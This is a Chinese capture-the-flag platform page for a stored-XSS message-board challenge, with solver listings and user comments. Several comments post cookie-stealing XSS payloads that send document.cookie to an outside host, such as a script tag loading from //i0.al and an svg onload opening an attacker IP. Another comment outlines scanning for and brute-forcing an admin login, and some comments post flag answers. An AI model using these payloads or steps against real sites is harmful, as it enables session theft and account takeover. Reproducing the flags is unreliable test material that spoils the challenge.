留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3242
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(18)
解题动态
liqs 攻破了该题 1天前
AzKanna 攻破了该题 2天前
jsbba 攻破了该题 4天前
2686213396 攻破了该题 4天前
sdgkk1234 攻破了该题 5天前
2kniden 攻破了该题 6天前
乱来小木 攻破了该题 7天前
lanza2451150 攻破了该题 8天前
WindZQ 攻破了该题 10天前
言寺介 攻破了该题 17天前
19902457330 攻破了该题 17天前
hhhh3 攻破了该题 18天前
LL77 攻破了该题 18天前
丞丞 攻破了该题 18天前
橙zi 攻破了该题 18天前
1111a 攻破了该题 18天前
aqsdd 攻破了该题 18天前
dask 攻破了该题 18天前
popk 攻破了该题 18天前
评论
lwq522725 1年前
举报
sCRiPt/SrC=//i0.al/Logugk>
qixi 2年前
举报
直接放入xss平台地址留言就行了
Jaylon 1年前
举报
来个xss平台
popoh 2年前
举报
db.sql压根就没有
songci 2年前
举报
flag{750d33e925f6dbf1784a1a924c237534}
19881191586 2年前
举报
第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码
treasure11 2年前
举报
....太难了
mAns0nw0W 2年前
举报
flag{0d25978069e52fed99591c5c19ca0663}
APTX4869ZRC 2年前
举报
BugKu真的很酷
Warm2pPing 2年前
举报
提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧
kanljk 2年前
举报
<svg onload="window.open('http://IP/'+document.cookie)">